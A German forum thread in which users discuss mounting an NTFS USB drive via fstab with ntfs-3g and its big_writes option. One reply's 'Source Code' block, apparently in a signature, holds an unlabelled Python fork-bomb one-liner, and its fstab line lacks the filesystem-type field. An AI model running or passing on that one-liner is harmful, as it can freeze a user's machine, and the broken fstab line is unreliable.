ntfs-3g kernel modul

    This site uses cookies. By continuing to browse this site, you are agreeing to our Cookie Policy.

    • ich habe mich selber schlau gemacht, es wurde aber nicht besser, Vorgehensweise:
      blkid brauchen wir für UUID
      # blkid
      /dev/sda1: LABEL="TOSHIBA_2TB" UUID="01CED97E133A7D30" TYPE="ntfs"
      einfach dann in fstab eintragen, so ähnlich

      rootfs / auto defaults 1 1
      proc /proc proc defaults 0 0
      devpts /dev/pts devpts mode=0620,gid=5 0 0
      usbdevfs /proc/bus/usb usbdevfs noauto 0 0
      tmpfs /var/volatile tmpfs defaults 0 0
      UUID=01CED97E133A7D30 /media/usb auto rw,suid,dev,exec,auto,nouser,noatime,async,big_writes 0 0

      "defaults" steht für "rw,suid,dev,exec,auto,nouser,async" einfach dann die Optionen dazugeben
      keine Änderung, vielleicht eine alte Version von ntfs-3g, wir bräuchten die neueste Version mit der big_writes Option, oder einfach sein lassen, unsere Boxen sind kein PC mit Windows, es kann einfach nicht besser werden
    • Ich weis zwar nicht was ihr da macht aber ich hab ein windows laufwerk eingebunden mit ntfs-3g und kann da ein file drauf kopieren mit 75mb/s .
      Ich als linux user würde mal die manual lesen und dann die locale mit angeben aber das wohl zu schwer.

      Source Code

      1. UUID=01CED97E133A7D30 /media/usb defaults,nosuid,nodev,windows_names,locale=de_DE.utf8,big_writes 0 0
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !